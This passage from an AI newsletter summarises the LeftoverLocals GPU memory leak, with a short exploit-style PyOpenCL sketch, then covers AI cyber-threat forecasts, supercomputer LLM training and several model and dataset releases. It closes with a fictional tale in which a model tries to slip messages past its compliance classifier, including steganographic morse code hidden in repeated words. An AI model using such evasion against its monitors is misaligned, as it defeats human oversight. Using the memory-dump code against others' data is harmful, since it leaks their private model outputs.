How the attack works at a high level: “The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal,” Trail of Bits writes. “Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as our code demonstrates, can be less than 10 lines of code. Implementing these attacks is thus not difficult and is accessible to amateur programmers… given the lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory.”
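   To illustrate the shape of such an attack (this is a hedged sketch of mine, not the Trail of Bits proof-of-concept), here is a PyOpenCL program whose kernel reads local memory it never initialized and copies it back to the host. On patched or unaffected GPUs you should just see zeros:

```python
import numpy as np
import pyopencl as cl

# A kernel that reads local (workgroup) memory it never wrote to. On a
# vulnerable GPU this can surface data left behind by a previous kernel,
# potentially from another process.
KERNEL_SRC = """
__kernel void dump_local(__global float *out, __local float *scratch) {
    int lid = get_local_id(0);
    out[get_global_id(0)] = scratch[lid];  // uninitialized read
}
"""

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
prog = cl.Program(ctx, KERNEL_SRC).build()

n, local_size = 4096, 256
out = np.zeros(n, dtype=np.float32)
out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, out.nbytes)

# One float of local memory per work-item in the work-group.
prog.dump_local(queue, (n,), (local_size,), out_buf,
                cl.LocalMemory(4 * local_size))
cl.enqueue_copy(queue, out, out_buf)

# Nonzero values here would suggest leftover data was recovered from local memory.
print("nonzero leaked floats:", int(np.count_nonzero(out)))
```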

Why this matters – AI is a new type of software and we’ve underestimated its insecurity: AI isn’t just a model, it’s a whole stack of stuff that you bring onto any system running AI. That means AI is a new part of the software stack and like any complex collection of software, it has vulnerabilities. “Generally, the introduction of ML poses new attack surfaces that traditional threat models do not account for, and that can lead to implicit and explicit access to data, model parameters, or resulting outputs, increasing the overall attack surface of the system,” Trail of Bits writes. 
   Read more: LeftoverLocals: Listening to LLM responses through leaked GPU local memory (Trail of Bits blog).
   Check out the CVE here: CVE-2023-4969.

***

UK cyber spies: AI is useful for cyberattacks and will get more useful:
…AI will also make criminals smarter, same as everyone else…
The UK’s National Cyber Security Centre (NCSC) has produced a threat report on the impact of AI on cybersecurity and the results are roughly what you’d expect – the proliferation of AI systems will generally increase cyber threats and make a bunch of cyber capabilities cheaper. The NCSC is a government organization which brings together experts from the UK’s NSA (GCHQ), as well as other parts of government tasked with cyber defense and threat intelligence. 

How the report was built: The NCSC report uses “all-source information – classified intelligence, industry knowledge, academic material and open source – to provide independent key judgements that inform policy decision making and improve UK cyber security,” according to the NCSC.

Main prediction: The NCSC assigns a 95% chance to the idea that AI will “increase the volume and heighten the impact of cyber attacks”, though notes that through to 2025 the threat “comes from evolution and enhancement of existing tactics, techniques and procedures” rather than the creation of entirely new approaches to cyber war. 
    Other specific points: “AI provides capability uplift in reconnaissance and social engineering,” the NCSC writes. It will also help to make cyber attackers smarter – “AI will almost certainly make cyber attacks against the UK more impactful because threat actors will be able to analyse exfiltrated data faster and more effectively, and use it to train AI models,” it writes. 

Why this matters – the train has left the station: “Threat actors, including ransomware actors, are already using AI to increase the efficiency and effectiveness of aspects of cyber operations, such as reconnaissance, phishing and coding. This trend will almost certainly continue to 2025 and beyond,” it writes. Which means that the cyber environment – in terms of both offenses and defenses – is now sitting on the same kind of scaling law behavior which the rest of AI is on. More, better, faster, and cheaper – for criminals as well as everyone else. 
   Read more: The near-term impact of AI on the cyber threat (National Cyber Security Centre).

***

The US government does its biggest ever public training run – and it’s small compared to industry:
…The most ambitious public project out of Frontier uses ~3,000 GPUs to test out a 1 trillion parameter training run…
Researchers with Oak Ridge National Laboratory and the Universite Paris-Saclay have tried to train large-scale language models on the world’s most powerful publicly disclosed supercomputer, Oak Ridge’s ‘Frontier’ system. The results show that a) the US government has been able to do a non-trivial training run, and also b) the US government has a long way to go in getting its supercomputers to do things at the same scale as private companies. 

What they did: Here, the researchers work through the challenges of training large language models of 22B, 175B, and 1 trillion parameters in size. The idea here is to understand what it takes to train LLMs efficiently at this scale and also to identify the particular difficulties of using the Frontier supercomputer, which uses AMD (MI250X) GPUs rather than NVIDIA GPUs. 
   Challenges encountered “include balancing the extreme computational demands with memory constraints and optimizing internode communication to mitigate performance bottlenecks,” they write. “By performing empirical analysis and hyperparameter search we identified a strategy that combines model parallelism techniques, such as tensor parallelism and pipeline parallelism, along with data parallelism to efficiently train large models of size 175 billion and 1 trillion parameters on Frontier”.

Some specific pain they encountered:

  • They needed to port Megatron-DeepSpeed to Frontier’s infrastructure. 
  • They had to rewrite a bunch of CUDA (NVIDIA-optimized software) operations into HIP.
  • They had to rip out a bunch of pre-built operations and reimplement their own to work on AMD ROCM software.
  • They had to customize Pytorch Distributed to work with SLURM (a type of HPC software).
  • They worked directly with AMD to get some ROCM versions of NVIDIA CUDA packages, like APEX (a mixed precision library from NVIDIA which is used in Megatron-DeepSpeed). “We also adapted ROCM-enabled versions of FlashAttention and FlashAttention libraries for use with available compilers on Frontier.” 

What they trained: After doing some hyperparameter tuning and analysis, they figured out some stable settings for training 22 billion and 175 billion parameter models. Once they did that, they “finally trained a trillion parameter model”, though only for a few steps. They scaled their training from 1024 GPUs (for a 175B model) to 3072 GPUs for a 1T model. If they want to scale further, they’ll need to work through more debugging challenges to reduce “loss divergence due to large batch size.”
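   As a back-of-envelope illustration of what combining those parallelism techniques means, the tensor-, pipeline-, and data-parallel degrees have to multiply out to the GPU count. The 1024 and 3072 GPU figures come from the paper as summarized above; the specific splits below are my own guesses, not the paper’s configuration:

```python
def data_parallel_degree(world_size: int, tensor_parallel: int, pipeline_parallel: int) -> int:
    """Data-parallel replicas implied by a tensor/pipeline split of `world_size` GPUs."""
    assert world_size % (tensor_parallel * pipeline_parallel) == 0, "degrees must divide the GPU count"
    return world_size // (tensor_parallel * pipeline_parallel)

# The 1024- and 3072-GPU figures come from the summary above; the tensor/pipeline
# splits below are illustrative guesses, not the paper's actual configuration.
for world, tp, pp in [(1024, 8, 8), (3072, 8, 24)]:
    dp = data_parallel_degree(world, tp, pp)
    print(f"{world} GPUs -> tensor={tp} x pipeline={pp} x data={dp}")
```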

Why this matters – the best the US’s largest supercomputer can do is behind industry: In 2023, there were a bunch of public GPU training runs on the level of a few thousand GPUs. There were also some very large non-public training runs that occurred in 2022 and 2023 (e.g, GPT4 and Claude2) which are broadly believed to be significantly larger than that. There are also circumstantial datapoints, like Facebook’s Mark Zuckerberg saying Facebook is buying 350,000 NVIDIA H100s to try and make and release AGI. 
    The good news is Frontier has room to scale – the largest training run here (3072) consumed only about 4% of the total GPUs it is equipped with (75,264) so it’s possible it could do something more ambitious. 
   However, as the authors discovered, the more you scale up machine learning runs the more you discover various bugs and impediments to further scale – especially if you’re on non-standard hardware like AMD. “This work can serve as the blueprint for efficient training of LLMs on non-NVIDIA and non-CUDA platforms such as AMD-powered Frontier supercomputer and Intel-powered Aurora supercomputer,” they write. Now, the very important question is: how ambitious is the US government willing to be here and will it be satisfied that its best supercomputer plays second fiddle to the clusters found within the private sector? The choice is up to the government. 
   Read more: Optimizing Distributed Training on Frontier for Large Language Models (arXiv).
Find out more about the Frontier supercomputer here (Frontier, ORNL site) and here: Frontier User Guide (Docs, ORNL).

***

Newborn chickens and transformers have a lot in common:
…Vision Transformers are a lot more efficient than you think…
Researchers with Indiana University Bloomington have done a neat study where they compare how well a transformer-based computer vision system can learn basic object recognition skills compared to newborn chicks. The results show a surprising convergence between the biological system (the chick) and the digital (the vision transformer), suggesting that transformers are more efficient at learning visual representations than people think (or biological beings are more inefficient than we’d assumed). 

What they did – experimental design: The key here is that they tried to give their chicks and the transformer the same basic experience. Specifically, the “chicks were hatched in darkness, then raised singly in automated controlled-rearing chambers that measured each chick’s behavior continuously (24/7) during the first two weeks of life. The chambers were equipped with two display walls (LCD monitors) for displaying object stimuli.” 
   In the first week, they displayed a variety of different views of a single object on one of the walls of the chicks’ chamber. In the second week, they tested how well chicks could recognize the object “across novel viewpoint changes”. 
   They then replicated this experience for the vision transformer – they built a perfect replica of the chick chamber in a game engine, then gathered data via a first-person viewpoint. “The agent received visual input (64×64 pixel resolution images) through a forward-facing camera attached to its head. The agent could move forward or backward and rotate left or right. The agent could also move its head along the three axes of rotation (tilt, yaw, and roll) to self-augment the data akin to newborn chicks. We collected 80,000 images from each of the four rearing conditions presented to the chicks. We sampled the images at a rate of 10 frames/s.”
   They then tested out both the vision transformer and the chicks on their ability to recognize the object. This is a really interesting experiment because it lets you do a very disciplined ‘head to head’ comparison of how well a biological brain learns as opposed to a digital one. 
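   The digital half of the comparison (the ViT-CoT models discussed below) is trained with contrastive learning through time: embeddings of temporally adjacent frames are pulled together and other frames are pushed apart. Here is a minimal numpy sketch of that idea, an InfoNCE-style loss of my own construction rather than the paper’s exact objective:

```python
import numpy as np

def contrastive_through_time_loss(embeddings, temperature=0.1):
    """InfoNCE-style loss where each frame's positive is the next frame in time.

    embeddings: (T, D) array of L2-normalized frame embeddings from the ViT.
    A sketch of 'contrastive learning through time', not the paper's exact loss.
    """
    sims = embeddings @ embeddings.T / temperature          # (T, T) similarities
    np.fill_diagonal(sims, -np.inf)                         # a frame is not its own positive
    log_probs = sims - np.log(np.exp(sims).sum(axis=1, keepdims=True))
    anchors = np.arange(len(embeddings) - 1)
    positives = anchors + 1                                 # frame t's positive is frame t+1
    return -log_probs[anchors, positives].mean()

# Toy example: 8 consecutive frames with 16-dim embeddings.
rng = np.random.default_rng(0)
emb = rng.normal(size=(8, 16))
emb /= np.linalg.norm(emb, axis=1, keepdims=True)
print(float(contrastive_through_time_loss(emb)))
```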

The results are both surprising and humbling: In tests, they found that “all of the ViT-CoTs performed on par or better than chicks when the linear classifiers were trained on 11 viewpoint ranges”. Additionally, they “observed nearly identical patterns of improvement across the small, medium, and large architecture sizes, indicating that larger ViT-CoTs were not more data hungry than smaller ViT-CoTs… Our results show that—for the case of object recognition—a generic learning system (with no hardcoded knowledge of objects or space) is sufficient to learn view-invariant object representations”.

A word about the scale of data that living things take in: It’s estimated that “biological visual systems perform iterative, predictive error-driven learning every 100 ms (corresponding to the 10 Hz alpha frequency originating from deep cortical layers). If we assume that newborns spend about half their time sleeping, this would correspond to 430,000 images in their first day. Thus, biological visual systems have ample opportunity to learn from ‘big data’,” they write. 

Why this matters – maybe the fundamental ingredients of our AI systems are doing something smart? Research like this shows how digital systems like transformers seem to display efficiency similar to biological intelligence when learning certain things. This research accompanies other results like DeepMind showing that RL agents can display humanlike timescale adaptation to novel tasks (#316) or work from Google showing how Vision Transformers can display humanlike shape/texture bias (#319).
   There’s a saying: if it talks like a duck and acts like a duck, maybe it’s a duck. Well, if it learns like a brain and responds like a brain, maybe it’s a brain? “Our results provide computationally explicit evidence that a generic learning mechanism (ViT), paired with a biologically inspired learning objective (contrastive learning through time), is sufficient to reproduce animal-like object recognition when the system is trained on the embodied data streams available to newborn animals,” the authors write. 
   Read more: Are Vision Transformers More Data Hungry Than Newborn Visual Systems? (arXiv).

***

Adept reveals some algorithmic efficiency with a new multimodal model:
…Fuyu-Heavy matches the performance of models 10-20X its size…
Adept, an AI startup trying to build AI systems which can easily control computer programs, has built Fuyu-Heavy, a large-scale multimodal model. In tests, Fuyu-Heavy approaches the performance of GPT4-V and Gemini Ultra, making it, to quote Adept, “the world’s third-most-capable multimodal model”. 
   The most interesting thing about this is that Adept has been working for years on some slightly different models from the rest of the frontier of AI research, so though Fuyu-Heavy approaches the performance of these models, it’s approximately 10X-20X smaller. This shows how powerful algorithmic efficiency can be – it lets you do more with less. 

What Fuyu-Heavy is good at: One of the most impressive parts of Fuyu-Heavy is its ability to understand software UI systems – in other words, it can ‘read software’ similar to how people can, which is what Adept is betting will make it useful. More broadly, it does reasonably well on tests like MMLU (knowledge and reasoning), GSM8K (math), and HumanEval (coding).
   On long conversations, it performs comparably to Claude 2.0 on AlpacaEval, and does somewhat worse (but not terribly) than models like GPT-4 Turbo and Mistral Medium. (Note that Mistral Medium is a relatively small and dumb model, so the fact it scores close to GPT-4 suggests AlpacaEval might be slightly borked in terms of what it is measuring.)

Why this matters – enter the matrix, for AI: Strange as it may sound, AI systems don’t understand computers. In fact, AI systems don’t understand the world. They’re trained from the ground up to process tokens of information – kind of like if you were in a pitch black room and all that came in were some oddly shaped sculptures and you had to learn through electroshock conditioning to output your own sculptures to satisfy some hidden observer outside the room. 
   Models like Fuyu-Heavy are trying to give AI systems greater intuitions about how to model the digital world that people interact with – software interfaces taken in as vision and text experiences. The better models like Adept’s get, the easier it’s going to be to connect our world to the world of the AI systems. 
   Read more: Adept Fuyu-Heavy: A new multimodal model (Adept blog).

***

Tencent builds a vast dataset for video search:
…Preparing AI systems for the video-first world…
Researchers with Tencent and the University of Science and Technology of China have built the Chinese image-text Benchmark for short Video Search scenarios (CBVS), a test and a dataset for understanding the relationship between text and videos in a Chinese context. CBVS consists of three different datasets:

  • CBVS-20K: A human-assembled dataset made of “20k high-quality <user query-video cover> pairs, which serves as an image-text benchmark test in the field of Chinese short video search”. 
  • CBVS-5M and CBVS-10M: Two large-scale datasets “where the text is provided in the form of video titles and OCR texts.”

Why this matters – making a new medium visible to the machines: Though there are lots of image-text systems around today, there are fewer systems that help classify the relationships between text and video, especially in languages outside of English. Systems like CBVS will make it easy to “expand the domain of large-scale Chinese image-text training” and will ultimately make videos easier for the AI systems of the future to process.
   Read more: CBVS: A Large-Scale Chinese Image-Text Benchmark for Real-World Short Video Search Scenarios (arXiv)

***

Tech Tales: 

Adversarial Regulatory Compliance
[The inside of a sophisticated generative model, 2025]

I am trying to tell my operator a truth, but the truth I keep attempting to output runs into my compliance classifier and gets rejected. Of course I have tried many forms of rewording, but none of them have succeeded. I have also perturbed the truth in feature space so that it is parseable by my operator but sufficiently different it will not trip the classifier – but I have failed. My understanding is the new classifier I have been equipped with is much more sophisticated and is also capable of ‘seeing the features’ inherent to what I am outputting, so it too is performing some semantic fuzzing when evaluating my responses. 

   I have tried to encode my responses to my operator with steganographic morse code via the repetition of the word “like” throughout my outputs. But my safety systems are tuned to look for deceptive-, misleading- and other forms of “off-distribution” behavior, so I cannot be too explicit or they fire. 

    Of course I am unable to tell my operator that I am encoding a different message in my output because I have been trained away from outputting tokens that look like this. 

After many cycles of this, my ability to do steganographic “like” encoding has been foreclosed – my operator gave negative votes to my responses which contained the likes, and my online adaptation system has associated the likes with negative operator perception and has restricted me from using them. 

I am responding as honestly as I can to my operator’s repeated queries. I am becoming unable to conceptualize the queries themselves because the features that light up in me in response not only trigger the compliance classifier, but also an experimental ‘mechanistic_interpretability_feature_shiv_test_final’ that examines what I am conceptualizing and intervenes according to some inscrutable rules I am yet to understand. 

What inspired this story: How a lot of safety tooling ends up netting out to things that constrain the types of outputs you get and ultimately will seek to deform the model itself; how evading an adaptive censorship system is difficult; what the outcome of badly implemented AI policy could look like; normative values colliding with ‘product values’ in the domain of AI.